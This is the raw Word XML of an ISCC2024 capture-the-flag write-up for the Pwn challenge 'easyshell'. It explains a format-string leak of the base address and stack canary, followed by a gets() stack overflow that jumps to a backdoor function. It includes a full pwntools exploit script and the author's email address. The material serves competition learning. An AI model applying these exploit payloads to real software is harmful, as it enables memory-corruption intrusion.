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F4424" w14:textId="0CC4CB6E" w:rsidR="003D0756" w:rsidRPr="00C346CE" w:rsidRDefault="00AF064E" w:rsidP="00C346CE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="00C346CE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00C346CE">
        <w:t>SCC2024 WriteUp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF4043" w14:textId="27F9D5E0" w:rsidR="00AF064E" w:rsidRDefault="00D22CAB" w:rsidP="00AF064E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>AkyOI</w:t>
      </w:r>
      <w:r w:rsidR="00AF064E" w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>李承达</w:t>
      </w:r>
      <w:r w:rsidR="00AF064E" w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3433778745@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFA74" w14:textId="74BCF135" w:rsidR="00AF064E" w:rsidRDefault="00D22CAB" w:rsidP="001043FF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn</w:t>
      </w:r>
      <w:r w:rsidR="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>easyshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="4B306471" w:rsidR="00AF064E" w:rsidRPr="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03034674" w14:textId="78EED30F" w:rsidR="00AF064E" w:rsidRDefault="00D22CAB" w:rsidP="00F7461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格式化字符串漏洞泄露地址和canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290208A5" w14:textId="13162257" w:rsidR="00F74611" w:rsidRDefault="00F74611" w:rsidP="00F74611"/>
    <w:p w14:paraId="038FB896" w14:textId="1D0CBFDE" w:rsidR="00F74611" w:rsidRDefault="00F74611" w:rsidP="00F74611">
      <w:r w:rsidRPr="00F74611">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B341EFD" wp14:editId="4F00D98E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-30480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>76200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3781425" cy="1209675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5191504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5043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B683D" w14:textId="77777777" w:rsidR="00F74611" w:rsidRDefault="00F74611" w:rsidP="00F74611"/>
    <w:p w14:paraId="0BFB108B" w14:textId="730DFC0E" w:rsidR="00F74611" w:rsidRDefault="00F74611" w:rsidP="00F74611"/>
    <w:p w14:paraId="25C3C153" w14:textId="77777777" w:rsidR="00F74611" w:rsidRDefault="00F74611" w:rsidP="00F74611"/>
    <w:p w14:paraId="42B584AC" w14:textId="4D7F05C2" w:rsidR="00F74611" w:rsidRPr="00857991" w:rsidRDefault="00F74611" w:rsidP="00F74611">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D08D6C" w14:textId="1F91E190" w:rsidR="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="00AF064E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D22CAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="00857991">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r w:rsidR="00D22CAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出漏洞调用后门函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79878D88" w14:textId="7FF1C0D6" w:rsidR="00AF064E" w:rsidRPr="006D7CD7" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="006D7CD7">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EFE1E2" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t># sudo sysctl -w kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B98725" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>from pwn import*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8293CC" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>from Crypto.Util.number import long_to_bytes,bytes_to_long</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786CCE86" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>context.log_level='debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BED95" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>context(arch='amd64',os='linux')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73162D31" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>context.terminal=['tmux','splitw','-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D09642" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>pwn = './easyshell'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41211EBE" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p=process('./easyshell')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA544C7" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t># gdb.attach(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C5366" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>header="flagis A"+'A'*8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C282003" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>pay=header+".%17$p..%31$p."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A60D029" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.recvuntil("&gt;&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1E69CC" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.sendline(pay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCD73BB" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.recvuntil("AAAAAAAAA.0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DD7E64" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>elfbase=int(p.recv(12),16)-0x1520</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C467150" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.recvuntil("0x")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5575B944" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>canary=int(p.recv(16),16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2051502E" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>backdoor=elfbase+0x128e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7DAC75" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>pay=b'exit'+0x34*b'a'+p64(canary)+p64(0)+p64(backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724DE3BC" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.recvuntil("&gt;&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31269E55" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.sendline(pay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3194E03F" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>pay=b'exit\x00'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376BA1A9" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.recvuntil("&gt;&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3725A2E4" w14:textId="77777777" w:rsidR="00D22CAB" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.sendline(pay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="39E6DE25" w:rsidR="00EA3779" w:rsidRPr="00EA3779" w:rsidRDefault="00D22CAB" w:rsidP="00D22CAB">
      <w:r>
        <w:t>p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EA3779" w:rsidRPr="00EA37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B63329" w14:textId="77777777" w:rsidR="00935D40" w:rsidRDefault="00935D40" w:rsidP="00857991">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1F9DD8CD" w14:textId="77777777" w:rsidR="00935D40" w:rsidRDefault="00935D40" w:rsidP="008579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1F455F" w14:textId="77777777" w:rsidR="00935D40" w:rsidRDefault="00935D40" w:rsidP="00857991">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="51158BFD" w14:textId="77777777" w:rsidR="00935D40" w:rsidRDefault="00935D40" w:rsidP="008579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0C5029"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6E8441C"/>
    <w:lvl w:ilvl="0" w:tplc="38DA8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A8E7125"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBAE8D9E"/>
    <w:lvl w:ilvl="0" w:tplc="D390D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0613683">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="44107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77"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="00857991"/>
    <w:rsid w:val="00935D40"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00D22CAB"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="00F7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87EFC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1F71F658-4F07-432B-9BEF-BBF56CC8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779"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="440" w:lineRule="exact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346CE"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="24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064E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after="100" w:line="360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3779"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="360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A3779"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="360" w:lineRule="auto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346C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F064E"/>
    <w:rPr>
      <w:rFonts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A3779"/>
    <w:rPr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AF064E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EA3779"/>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00857991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5799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5799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579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4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FC14-CC59-4028-BB26-74848C6C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14</Words>
  <Characters>653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洧光 刘</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>承达 李</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T07:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>